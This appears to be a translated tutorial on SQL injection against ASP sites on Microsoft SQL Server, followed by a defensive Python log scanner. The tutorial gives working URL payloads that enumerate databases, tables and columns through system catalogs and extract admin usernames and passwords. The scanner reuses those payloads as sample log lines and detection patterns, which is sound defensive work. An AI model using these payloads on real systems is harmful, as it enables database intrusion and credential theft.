SQL injection is flexible and the injected statements differ from case to case, so only the general steps of each branch are given here. I hope they help.
1: Enumerate all database names. Submit:
   http://www.**.com/***.asp?id=1 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
   Then submit dbid = 7, 8, 9 ... to get more database names.
2: Enumerate the table names. Suppose the databases found in step 1 include one named BBS. Submit the following statement:
   http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name from BBS.dbo.sysobjects where xtype='u')
   This returns one table; assume it is admin. Then submit:
   http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name from BBS.dbo.sysobjects where xtype='u' and name not in ('admin'))
   to get the other tables.
3: Enumerate the fields. Submit:
   http://www.***.com/***.asp?id=1 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
   This returns the UID value; assume it is 18779569 (UID = ID). Then submit:
   http://www.***.com/***.asp?id=1 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)
   This returns one field of admin; assume it is user_id.
4: Retrieve the username, password, and so on:
   http://www.***.com/***.asp?id=1 and 0<(select user_id from bbs.dbo.admin where username>1)
   The password can be obtained in turn the same way.
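For defenders, every request in steps 1 to 4 leaves the same trace in web logs: a numeric id parameter carrying a subquery that names a system catalog. The following is an added example, not part of the original page; the log lines are constructed, the function names are hypothetical, and it goes slightly beyond the steps above by also unwrapping double URL encoding.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# System catalogs named in steps 1-3; a numeric id parameter never needs them.
CATALOG = re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b", re.I)
SUBQUERY = re.compile(r"\(\s*select\b", re.I)
INTEGER = re.compile(r"\d{1,10}")

# Constructed sample requests, shaped like a logged URI stem plus query string.
SAMPLE_LOG = [
    "/jump.asp?id=1",
    "/jump.asp?id=1%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases"
    "%20where%20name>1%20and%20dbid=6)",
    "/jump.asp?id=1+and+0<>(select+top+1+name+from+bbs.dbo.sysobjects+where+xtype='u')",
    "/jump.asp?Id=1%2520and%25200<>(select%2520top%25201%2520name%2520from"
    "%2520bbs.dbo.syscolumns%2520where%2520id=18779569)",
    "/list.asp?id=42&page=2",
]

def decode_fully(value, max_rounds=3):
    """Undo nested URL encoding so double-encoded input is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(request, numeric_params=("id",)):
    """Return the reasons a request looks like catalog enumeration via a numeric parameter."""
    reasons = []
    for name, raw in parse_qsl(urlsplit(request).query, keep_blank_values=True):
        value = decode_fully(raw)
        if name.lower() in numeric_params and not INTEGER.fullmatch(value.strip()):
            reasons.append("non-integer " + name.lower())
        if SUBQUERY.search(value):
            reasons.append("subquery")
        hit = CATALOG.search(value)
        if hit:
            reasons.append("catalog:" + hit.group(1).lower())
    return reasons

def flagged(log):
    """Map each suspicious request to its reasons; clean requests are omitted."""
    return {req: why for req in log if (why := classify(req))}

if __name__ == "__main__":
    for req, why in flagged(SAMPLE_LOG).items():
        print(", ".join(why), "<-", req[:60])
```

The same integer check belongs in the application itself, before the value reaches the query, together with parameterized statements; the log scan only shows where that check was missing.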